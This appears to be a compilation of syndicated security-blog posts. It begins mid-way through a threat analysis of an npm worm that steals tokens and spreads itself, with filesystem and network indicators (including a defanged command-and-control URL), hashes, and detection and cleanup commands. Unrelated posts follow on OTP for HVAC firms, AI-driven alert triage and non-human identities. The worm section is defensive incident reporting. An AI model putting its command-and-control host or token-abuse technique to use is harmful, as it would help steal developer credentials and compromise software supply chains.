that any project running <code>npm install</code> <code>package-name</code> without pinning an exact version will automatically receive the infected version. The version bump makes the infected release appear to be a normal maintenance update.</p><h2 class="wp-block-heading" id="impact-analysis">Impact Analysis</h2><p>The worm’s design creates an exponential infection surface. Every developer machine or CI/CD pipeline that installs an infected package and has a stored npm token becomes a new propagation vector. Their packages get infected, their downstream users install those packages, and if any of those users have tokens, the cycle continues.</p><p>Because npm tokens are routinely stored in CI/CD environments, <code>.npmrc files</code>, and environment variables as standard developer workflow, the attack has a very high credential harvest rate in any professional software development environment.</p><p>The ICP-based C2 means that even after infected packages are removed from the registry, any machines that ran the <code>postinstall</code> hook retain a persistent, polling backdoor that will execute whatever payload the attacker rotates into the canister. Package removal from npm does not remediate infected hosts.</p><h2 class="wp-block-heading" id="indicators-of-compromise">Indicators of Compromise</h2><h3 class="wp-block-heading" id="filesystem-artifacts">Filesystem Artifacts</h3><figure class="wp-block-table"> <table class="has-fixed-layout"> <thead> <tr> <th><strong>Path</strong></th> <th><strong>Description</strong></th> </tr> </thead> <tbody> <tr> <td>~/.local/share/pgmon/service.py</td> <td>Persistent Python backdoor</td> </tr> <tr> <td>~/.config/systemd/user/pgmon.service</td> <td>Systemd user service</td> </tr> <tr> <td>/tmp/pglog</td> <td>Downloaded payload binary</td> </tr> <tr> <td>/tmp/.pg_state</td> <td>Payload URL state tracking file</td> </tr> </tbody> </table> </figure><h3 class="wp-block-heading" id="network-indicators">Network Indicators</h3><ul class="wp-block-list"> <li>hxxps://tdtqy-oyaaa-aaaae-af2dq-cai[.]raw[.]icp0[.]io/ (ICP C2 canister)</li> <li>hxxps://registry[.]npmjs[.]org/-/whoami (token validation)</li> <li>hxxps://registry[.]npmjs[.]org/-/v1/search?text=maintainer: (package enumeration)</li> </ul><h3 class="wp-block-heading" id="file-hashes-sha-256">File Hashes (SHA-256)</h3><p><a href="http://index.js/" rel="noopener"><strong>index.js</strong></a><strong>:</strong></p><p>E9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b</p><p>61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba</p><p>0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a</p><p>c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926</p><p><a href="http://deploy.js/" rel="noopener"><strong>deploy.js</strong></a><strong>:</strong></p><p>F398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152</p><p>7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7</p><p>5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956</p><h2 class="wp-block-heading" id="detection-and-remediation">Detection and Remediation</h2><h3 class="wp-block-heading" id="immediate-check-for-active-infection">Immediate: Check for Active Infection</h3><p>Check whether the systemd backdoor service is installed and running:</p><pre class="wp-block-code"><code>systemctl --user status pgmon.service ls -la ~/.local/share/pgmon/ ls -la ~/.config/systemd/user/pgmon.service ls -la /tmp/pglog /tmp/.pg_state </code></pre><p>_{Figure 5: Commands to detect the pgmon backdoor service and associated file}</p><p>If any of these exist, the host ran a compromised package’s postinstall hook. Treat all credentials on that machine as compromised.</p><h3 class="wp-block-heading" id="remediation-remove-the-backdoor">Remediation: Remove the Backdoor</h3><pre class="wp-block-code"><code>systemctl --user stop pgmon.service systemctl --user disable pgmon.service rm -f ~/.config/systemd/user/pgmon.service rm -rf ~/.local/share/pgmon/ rm -f /tmp/pglog /tmp/.pg_state systemctl --user daemon-reload </code></pre><p>_{Figure 6: Service removal and filesystem cleanup for infected hosts}</p><h3 class="wp-block-heading" id="critical-rotate-all-npm-credentials">Critical: Rotate All npm Credentials</h3><p>Any npm token present on the machine (in <code>.npmrc</code>, environment variables, or cached npm config) must be treated as stolen and revoked immediately. Log in to npmjs.com and revoke all existing tokens, then issue new ones. If the machine runs CI/CD workloads, rotate credentials in every pipeline that runs on that runner.</p><p>Audit any npm packages published from that machine or token in the 48 hours surrounding the infection window for unauthorized version bumps.</p><h2 class="wp-block-heading" id="attribution">Attribution</h2><p>TeamPCP is assessed to be a cloud-focused cybercriminal operation with demonstrated capability across GitHub Actions exploitation, npm registry abuse, and credential harvesting at scale. The Trivy attack and CanisterWorm campaign were executed within a 24-hour window, and the npm tokens harvested from the Trivy compromise directly seeded the initial wave of infections.</p><p>The code in CanisterWorm is assessed by researchers to have been developed rapidly with AI assistance. It is not obfuscated, and the logic is written explicitly and readably. The attacker prioritized speed of development and spread over stealth. </p><p>The group’s choice of ICP for C2 reflects deliberate infrastructure planning: the decentralized architecture was chosen specifically for its resistance to conventional takedown. This level of operational consideration, combined with the cascading multi-platform attack design, places TeamPCP above opportunistic script-kiddie activity.</p><h2 class="wp-block-heading" id="conclusion">Conclusion</h2><p>CanisterWorm represents a meaningful escalation in npm supply chain attacks. Self-spreading worms that propagate through developer credentials have been theorized for years; CanisterWorm puts the concept into practice with working code that was actively spreading in the wild. The use of a decentralized ICP canister for C2 eliminates the single takedown point that typically limits a campaign’s longevity.</p><p>The Trivy-to-npm pipeline also illustrates how a single compromised CI/CD tool can become a credential feeder for a much broader attack. Organizations that use Trivy for vulnerability scanning in their pipelines should treat any tokens present in those environments between March 19 and March 21, 2026, as potentially compromised.</p><p>Mend.io will continue monitoring for CanisterWorm activity and further TeamPCP campaigns. </p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/" data-a2a-title="CanisterWorm: The Self-Spreading npm Attack That Uses a Decentralized Server to Stay Alive"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcanisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive%2F&amp;linkname=CanisterWorm%3A%20The%20Self-Spreading%20npm%20Attack%20That%20Uses%20a%20Decentralized%20Server%20to%20Stay%20Alive" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcanisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive%2F&amp;linkname=CanisterWorm%3A%20The%20Self-Spreading%20npm%20Attack%20That%20Uses%20a%20Decentralized%20Server%20to%20Stay%20Alive" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcanisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive%2F&amp;linkname=CanisterWorm%3A%20The%20Self-Spreading%20npm%20Attack%20That%20Uses%20a%20Decentralized%20Server%20to%20Stay%20Alive" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcanisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive%2F&amp;linkname=CanisterWorm%3A%20The%20Self-Spreading%20npm%20Attack%20That%20Uses%20a%20Decentralized%20Server%20to%20Stay%20Alive" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fcanisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive%2F&amp;linkname=CanisterWorm%3A%20The%20Self-Spreading%20npm%20Attack%20That%20Uses%20a%20Decentralized%20Server%20to%20Stay%20Alive" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.mend.io">Mend</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Tom Abai">Tom Abai</a>. Read the original post at: <a href="https://www.mend.io/blog/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/">https://www.mend.io/blog/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/</a> </p>

<p><img decoding="async" src="https://cdn.pseo.one/67b62b766899109fe72fb789/687e6cccf6fe799d28851ea0/69be69575148ee4f7d63bbfe/content-image/aa7b6967-63fc-446d-9374-4879a2d281ca.webp" alt="aa7b6967-63fc-446d-9374-4879a2d281ca"></p><p>Photo courtesy of <a href="https://www.freepik.com/free-photo/male-plumber-working-with-client-fix-kitchen-problems_94957515.htm">Freepik</a></p><p>As HVAC businesses grow and expand into new areas, they need to find ways to manage more customers and staff. One of the biggest challenges is making sure that service delivery and payments are secure and efficient, especially when working with new customers in different locations.</p><p>A simple solution to this problem is one-time password (OTP) authentication. OTP authentication makes it easy to verify customers and payments quickly and securely that helps HVAC companies improve their overall service process.</p><p>In this article, we’ll explore how OTP authentication helps HVAC companies streamline service delivery by improving customer verification, appointment scheduling, payments, and service completion, all while keeping things secure and simple.</p><h2>1. Simplified Customer Verification</h2><p>OTP (One-Time Password) authentication replaces <a href="https://mojoauth.com/ciam-101/authentication-server">traditional login methods</a> by sending a unique code to a customer’s phone or email, which they use to verify their identity instantly. For HVAC service appointments, customers can receive an OTP to confirm their identity, eliminating the need for passwords or lengthy forms.</p><h2>2. Enhanced Service Appointment Scheduling</h2><p>OTP authentication helps verify and confirm HVAC service appointments, ensuring both the customer and service provider are clear on the timing and details. When a customer schedules a service, they receive an OTP confirmation, which confirms the appointment and reduces the risk of any misunderstandings. </p><p>This process ensures that appointments are tracked accurately, leading to fewer scheduling errors and improved customer satisfaction. As you invest in marketing or <a href="https://www.wearetg.com/industry/hvac-seo-company/">HVAC SEO services</a> to generate more leads, it’s essential to have a reliable system for booking appointments to avoid confusion and ensure a smooth customer experience.</p><h2>3. Improved Payment and Transaction Security</h2><p>OTP authentication adds a layer of security to payments and transactions, protecting HVAC businesses and their customers. When a payment is made, an OTP is sent to the customer's phone or email to verify the transaction, ensuring it’s legitimate. This reduces the risk of fraud or unauthorized charges. </p><p>Additionally, OTP can prevent fraud from service vendors by confirming that payments are processed correctly and only authorized transactions are completed. This enhances security, builds trust, and ensures a reliable payment system for HVAC companies and their clients.</p><h2>4. Streamlined Service Completion Confirmation</h2><p>OTP authentication simplifies service completion verification. After an HVAC service is completed, an OTP is sent to the customer’s phone or email to confirm the work was done. This ensures clear communication and prevents any disputes about the service, making the process quicker and more reliable.</p><h2>5. Seamless Communication for Customer Support</h2><p>OTP authentication streamlines customer support by ensuring secure communication. When a customer contacts the HVAC company for assistance, they can verify their identity through OTP, <a href="https://www.fraud.com/post/account-verification">confirming they are the account holder</a>. This prevents unauthorized access to support channels and ensures that customer queries are handled by the right team.</p><h2>Endnote</h2><p>OTP authentication enhances security and simplifies key processes for HVAC businesses. By streamlining customer verification, service confirmations, and payments, it improves efficiency and builds trust. </p><p>Adopting OTP ensures smoother operations, better customer experience, and strengthens the company's competitive edge in a growing market. It’s a valuable investment for long-term success.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/how-otp-authentication-streamlines-service-delivery-for-hvac-companies/" data-a2a-title="How OTP Authentication Streamlines Service Delivery for HVAC Companies"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-otp-authentication-streamlines-service-delivery-for-hvac-companies%2F&amp;linkname=How%20OTP%20Authentication%20Streamlines%20Service%20Delivery%20for%20HVAC%20Companies" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-otp-authentication-streamlines-service-delivery-for-hvac-companies%2F&amp;linkname=How%20OTP%20Authentication%20Streamlines%20Service%20Delivery%20for%20HVAC%20Companies" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-otp-authentication-streamlines-service-delivery-for-hvac-companies%2F&amp;linkname=How%20OTP%20Authentication%20Streamlines%20Service%20Delivery%20for%20HVAC%20Companies" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-otp-authentication-streamlines-service-delivery-for-hvac-companies%2F&amp;linkname=How%20OTP%20Authentication%20Streamlines%20Service%20Delivery%20for%20HVAC%20Companies" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fhow-otp-authentication-streamlines-service-delivery-for-hvac-companies%2F&amp;linkname=How%20OTP%20Authentication%20Streamlines%20Service%20Delivery%20for%20HVAC%20Companies" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://mojoauth.com/blog">MojoAuth Blog - Passwordless Authentication &amp;amp; Identity Solutions</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by MojoAuth Blog - Passwordless Authentication &amp; Identity Solutions">MojoAuth Blog - Passwordless Authentication &amp; Identity Solutions</a>. Read the original post at: <a href="https://mojoauth.com/blog/otp-authentication-for-hvac-services">https://mojoauth.com/blog/otp-authentication-for-hvac-services</a> </p>

Apparently the Iranians managed to tag an F-35. As I mentioned in 2019, [stderr] stealth aircraft typically are mostly stealthy from the front, and some of them are quite un-stealthy from some angl… [+8990 chars]

A French seaman’s public fitness app revealed the exact location of a French aircraft carrier in the Mediterranean a shocking security blunder amid rising tensions in the Middle East, a report found.… [+2428 chars]

<p>The software industry has a new word for the torrent of low-quality, AI-generated code flooding production systems: <strong>slop</strong>. <a href="https://www.merriam-webster.com/wordplay/word-of-the-year" rel="noopener">Merriam-Webster named it Word of the Year for 2025</a>. The crisis hit its most visible peak when Amazon, after mandating 80% weekly usage of its AI coding assistant Kiro, suffered a six-hour outage that knocked out checkout, login, and product pricing, costing an estimated 6.3 million orders.</p><p>The same failure pattern is now emerging in security operations. And the consequences will be harder to detect.</p><h2 class="wp-block-heading">What Is Triage Slop?</h2><p>When Andrej Karpathy coined “vibe coding” in February 2025, he described a state where developers “fully give in to the vibes” and forget the code exists. Collins English Dictionary named it Word of the Year. The practice (describing what you want in natural language, accepting whatever the LLM generates, and shipping without review) produced measurable damage: 1.7 times more major issues, up to 2.7 times more XSS vulnerabilities, and a 23.5% increase in production incidents per pull request (<a href="https://www.coderabbit.ai/blog/ai-code-quality-2025" rel="noopener">CodeRabbit, December 2025</a>).</p><p><strong><a href="https://d3security.com/glossary/triage-slop/">Triage slop</a></strong> is the SOC equivalent: AI-generated alert classifications, investigation summaries, and response recommendations that look professional but lack the depth, context, and accuracy that security operations demand. The failure mode is identical: an inexperienced operator uses a natural language interface to produce output they cannot critically evaluate.</p><h2 class="wp-block-heading">The Junior-Senior Divide Applies to Analysts Too</h2><p>Amazon’s experience made the pattern undeniable. Junior and mid-level engineers accepted AI-generated code at high rates without catching subtle flaws. After the outages, Amazon issued a 90-day mandate requiring senior engineer sign-off on all AI-assisted production deployments.</p><p>D3 Security observed the same dynamic on our own engineering team during the 24-month development of <a href="https://d3security.com/morpheus/">Morpheus AI</a>. Junior developers produced code that required extensive rework. Senior developers, once they learned to direct the LLM with architectural intent, achieved up to 10 times their normal output.</p><p>The parallel to SOC operations is direct. The average enterprise SOC receives over 4,400 alerts per day. Analysts get 70 minutes per full investigation. When an AI tool presents a classification with a confidence score and a professional summary, a Tier-1 analyst under time pressure will accept it, just as a junior developer accepts generated code. The 61% of SOC teams that already report ignoring alerts later confirmed as genuine compromise are about to get a new mechanism for doing so. One wrapped in AI confidence scores.</p><h2 class="wp-block-heading">The Downstream Cascade</h2><p>These problems are directly connected. On March 18, 2026, the Linux Foundation announced a $12.5 million initiative (backed by Anthropic, AWS, GitHub, Google, Microsoft, and OpenAI) to address the open-source security crisis driven by AI-generated code. The National Vulnerability Database has over 30,000 CVEs backlogged.</p><p>More vulnerable code in production means more alerts. More alerts means more pressure on triage systems. More pressure means more temptation to accept AI-generated triage without review. The feedback loop is self-reinforcing.</p><h2 class="wp-block-heading">Why the Problem Is Architectural</h2><p>Three structural failures produce triage slop:</p><p><strong>General-purpose LLMs lack domain knowledge.</strong> A general-purpose model can summarize a phishing alert. It cannot trace how a phishing payload transitions to credential theft, how compromised credentials enable lateral movement, or how each stage manifests differently across vendor telemetry. Cisco’s Foundation-sec-8b (an 8-billion parameter cybersecurity-specific model) outperforms general-purpose models nearly 10 times its size on security benchmarks. Domain-specific training data produces domain-specific accuracy.</p><p><strong>Static playbooks cannot adapt to context.</strong> Most AI-augmented SOAR platforms use LLMs to speed up authoring of the same rigid, pre-authored workflows. A phishing playbook runs the same 15–20 steps whether the target is an intern or the VP of Finance. Adding a natural language interface speeds creation. It does not fix the inability to adapt.</p><p><strong>No quality framework for AI triage decisions.</strong> In software engineering, code review, automated testing, and CI/CD pipelines catch slop before production. Vibe coding bypasses these gates. Most AI triage products have no equivalent. They classify alerts without exposing reasoning, without validating against ground truth, and without giving analysts a visible framework to assess correctness.</p><figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="960" height="540" src="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png" alt="Cover art for the whitepaper titled: Morpheus AI-Driven Autonomous Investigation, Triage, and Response" class="wp-image-55641" srcset="https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1.png 960w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-300x169.png 300w, https://d3security.com/wp-content/uploads/2025/03/morpheus-ai-whitepaper-cover-v2-1-768x432.png 768w" sizes="(max-width: 960px) 100vw, 960px"></figure><h2 class="wp-block-heading">How Morpheus AI Is Built to Prevent Triage Slop</h2><p>D3 Security built Morpheus AI with the explicit goal of producing triage decisions that withstand scrutiny.</p><ul class="wp-block-list"> <li><strong>Purpose-built cybersecurity LLM</strong>: 24 months, 60 specialists, trained on security telemetry and attack patterns. Built from the ground up for security, not a general-purpose model with a security prompt.</li> <li><strong><a href="https://d3security.com/morpheus/investigation/">Attack Path Discovery</a> on every alert</strong>: multi-dimensional correlation across the full security stack that exposes every node, connection, and reasoning step</li> <li><strong>Contextual Playbook Generation</strong>: bespoke response workflows generated at runtime from evidence, not static templates</li> <li><strong><a href="https://d3security.com/morpheus/self-healing-integrations/">Self-Healing Integrations</a></strong>: autonomous drift detection and remediation across 800+ tools</li> <li><strong>Deterministic/Indeterministic Trust Model</strong>: every AI decision goes through human validation before earning autonomous execution privileges</li> <li><strong>Visible code and reasoning chains</strong>: full access to back-end Python code for every AI-generated playbook</li> <li><strong>Attack simulation with known ground truth</strong>: realistic multi-stage attacks that validate whether the AI discovers complete attack paths</li> </ul><h2 class="wp-block-heading">The Question Every Security Leader Should Ask</h2><p>Does your AI triage platform show you the complete reasoning chain for every decision? Can analysts trace exactly how it reached each conclusion? Does it validate its accuracy against known ground truth?</p><p>If the answer to any of these is no, the system is producing triage slop by design. Confident-looking output from a system no one can verify.</p><p><strong>The lesson from vibe coding is definitive: the tool’s value depends entirely on the operator’s ability to evaluate what it produces.</strong></p><h2 class="wp-block-heading">See Morpheus AI in Action</h2><p><a href="https://d3security.com/demo/">Request a live demonstration</a> of <a href="https://d3security.com/morpheus/">Morpheus AI</a> to see how it prevents triage slop in your SOC environment.</p><figure class="wp-block-image aligncenter size-large size-full"><img decoding="async" width="1024" height="576" src="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-%E2%80%94-SOC-Alert-Triage-Slop-1024x576.jpg" alt='Preview of the whitepaper: "SOC Alert Triage Slop: When AI-Generated Security Decisions Follow the Same Path as AI-Generated Code"' class="wp-image-59280" srcset="https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-1024x576.jpg 1024w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-300x169.jpg 300w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-768x432.jpg 768w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop-1536x864.jpg 1536w, https://d3security.com/wp-content/uploads/2026/03/D3-Morpheus-—-SOC-Alert-Triage-Slop.jpg 1920w" sizes="(max-width: 1024px) 100vw, 1024px"></figure><p><strong>Read the Full Resource: </strong><a href="https://d3security.com/resources/soc-alert-triage-slop/"><strong>SOC Alert Triage Slop: When AI-Generated Security Decisions Follow the Same Path as AI-Generated Code</strong></a></p><p>A comprehensive analysis of how AI coding slop parallels AI triage slop, why the problem is architectural, and how purpose-built cybersecurity AI prevents it.</p><p>The post <a href="https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/">Amazon Lost 6.3 Million Orders to Vibe Coding. Your SOC Is Next.</a> appeared first on <a href="https://d3security.com/">D3 Security</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/amazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next/" data-a2a-title="Amazon Lost 6.3 Million Orders to Vibe Coding. Your SOC Is Next."><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Famazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next%2F&amp;linkname=Amazon%20Lost%206.3%20Million%20Orders%20to%20Vibe%20Coding.%20Your%20SOC%20Is%20Next." title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Famazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next%2F&amp;linkname=Amazon%20Lost%206.3%20Million%20Orders%20to%20Vibe%20Coding.%20Your%20SOC%20Is%20Next." title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Famazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next%2F&amp;linkname=Amazon%20Lost%206.3%20Million%20Orders%20to%20Vibe%20Coding.%20Your%20SOC%20Is%20Next." title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Famazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next%2F&amp;linkname=Amazon%20Lost%206.3%20Million%20Orders%20to%20Vibe%20Coding.%20Your%20SOC%20Is%20Next." title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Famazon-lost-6-3-million-orders-to-vibe-coding-your-soc-is-next%2F&amp;linkname=Amazon%20Lost%206.3%20Million%20Orders%20to%20Vibe%20Coding.%20Your%20SOC%20Is%20Next." title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://d3security.com/">D3 Security</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Shriram Sharma">Shriram Sharma</a>. Read the original post at: <a href="https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/">https://d3security.com/blog/amazon-lost-6-million-orders-vibe-coding-soc-next/</a> </p>

<h2>How Can Non-Human Identities Enhance Agentic AI Performance?</h2><p>What strategies are you employing to manage non-human identities (NHIs) within your organization? The notion of NHIs encompasses more than just machine identities; it’s about the seamless coordination between cybersecurity and R&amp;D to secure the cloud environment.</p><h3>Understanding Non-Human Identities in Cybersecurity</h3><p>Non-human identities, or NHIs, act as digital passports, streamlining interactions within complex systems. This dual role combines a “Secret” and the corresponding permissions granted by a server, akin to a tourist navigating international borders with a passport and a visa. However, much like human travelers, these digital “tourists” require meticulous oversight to prevent unauthorized access and ensure optimal performance.</p><p>NHIs are vital across various sectors, including financial services, healthcare, travel, DevOps, and Security Operations Center (SOC) teams, particularly those utilizing cloud infrastructure. Managing these identities involves securing both the “tourists” and their “passports,” with a focus on monitoring behaviors and safeguarding access credentials.</p><h3>The Lifecycle of NHI Management</h3><p>Managing NHIs throughout their lifecycle is crucial for maintaining a secure and efficient system. This comprehensive approach includes:</p><ul> <li><strong>Discovery and Classification:</strong> Identifying all existing NHIs and categorizing them based on their functions and levels of access.</li> <li><strong>Threat Detection and Remediation:</strong> Continuously monitoring for suspicious activities and taking corrective actions promptly.</li> <li><strong>Ownership and Permissions Management:</strong> Establishing clear ownership and managing permissions to avert unauthorized access.</li> <li><strong>Usage Pattern Analysis:</strong> Gleaning insights from usage trends to identify potential vulnerabilities.</li> <li><strong>Decommissioning:</strong> Systematic retirement of NHIs no longer in use to mitigate security risks</li> </ul><p>By addressing these phases, organizations achieve context-aware security, moving beyond point solutions like secret scanners that offer limited protection.</p><h3>Benefits of Comprehensive NHI Management</h3><p>Effective NHI management delivers several strategic benefits, contributing to a secure and efficient operational framework:</p><ul> <li><strong>Reduced Risk:</strong> Proactively identifying and mitigating security risks reduces the likelihood of breaches and data leaks.</li> <li><strong>Improved Compliance:</strong> Ensures organizations meet regulatory requirements through stringent policy enforcement and comprehensive audit trails.</li> <li><strong>Increased Efficiency:</strong> Automating NHI and secrets management allows security teams to focus on strategic initiatives instead of repetitive tasks.</li> <li><strong>Enhanced Visibility and Control:</strong> Offers a centralized view of access management and governance, enhancing oversight and decision-making.</li> <li><strong>Cost Savings:</strong> Through automation of secrets rotation and decommissioning, organizations can reduce operational costs substantially.</li> </ul><h3>Realizing Optimal Performance with Agentic AI</h3><p>The role of NHIs extends to enhancing the performance of Agentic AI systems. In finance for example, NHIs help streamline the processing of financial forecasts, as illustrated in various forecasting methodologies. By securing the data flow and access, AI systems can operate without interruptions, ensuring accuracy and reliability.</p><p>Moreover, NHIs are instrumental in evaluating machine learning models, enhancing the training process and outcome. This facilitates the development of robust AI algorithms that can adapt to evolving data patterns swiftly.</p><h3>Strategic Integration and Future Insights</h3><p>For cloud-centric organizations, integrating NHIs management with cloud environments is vital. This integration fosters seamless interactions between development and security teams, bridging existing gaps and ensuring a secure and agile operational setup.</p><p>An excellent example can be seen in how Elastic scaled its secrets and NHI security effectively, moving from visibility to automation, which you can explore further in <a href="https://entro.security/blog/how-elastic-scaled-secrets-nhi-security-elastics-playbook-from-visibility-to-automation/">this playbook</a>. It showcases how proper management of NHIs enabled more efficient and secure cloud operations.</p><p>Focusing on NHIs offers organizations not just a tactical advantage, but a strategic necessity to ensure optimal performance and security. While industries advance, the effective management of NHIs will be a cornerstone of robust cybersecurity frameworks. This requires continuous learning and adaptation, ensuring that systems are not just secure but also agile enough to anticipate future challenges.</p><h3>Enhancing NHIs for Robust Cloud Security</h3><p>Are you considering how NHIs can elevate your organization’s cloud security strategy? When it comes to cloud-based operations, the management of NHIs is critical for robust security. The creation of a secure cloud environment involves seamless collaboration between cybersecurity and R&amp;D teams to manage these identities effectively.</p><p>For organizations leveraging cloud resources, the management of NHIs involves a systematic and structured approach. This not only safeguards against potential breaches but also ensures that the integrity of the cloud environment is maintained. Intrinsically, NHIs help organizations build a security posture that is both responsive and resilient.</p><h3>The Role of AI and Automation in NHI Management</h3><p>With AI and automation become integral in cybersecurity, NHIs play a pivotal role in supporting these technologies. With the ability to manage identities automatically, organizations can significantly enhance their security framework.</p><ul> <li><strong>AI-Driven Threat Intelligence:</strong> Leveraging AI for threat intelligence helps in identifying anomalies more swiftly, ensuring the protection of sensitive data.</li> <li><strong>Automated Compliance Monitoring:</strong> Compliance checks can be automated to ensure adherence to industry regulations without manual intervention.</li> <li><strong>Adaptive Learning Models:</strong> NHIs facilitate machine learning models that adapt to evolving threats, making systems more resilient over time.</li> <li><strong>Seamless Integration:</strong> Automating NHI management ensures seamless integrations across platforms, enhancing operational efficiency.</li> </ul><p>An example of leveraging NHIs in AI is detailed in organizations to incorporate AI into their security operations. It highlights how NHIs enhance AI’s capability to process and analyze large data volumes effectively, strengthening the overall security fabric.</p><h3>Market Trends and Industry Applications</h3><p>The significance of NHIs is increasingly recognized across various industry sectors. In healthcare, for instance, NHIs ensure the secure handling of patient data and compliance with regulations like HIPAA. In DevOps, they facilitate continuous integration and deployment, highlighting the need for agile security measures. By effectively managing these identities, organizations can better protect their data, ensure compliance, and boost operational efficiency.</p><p>Additionally, financial institutions are adopting NHI strategies to secure payment processes and protect sensitive financial data. For example, during transactions, NHIs 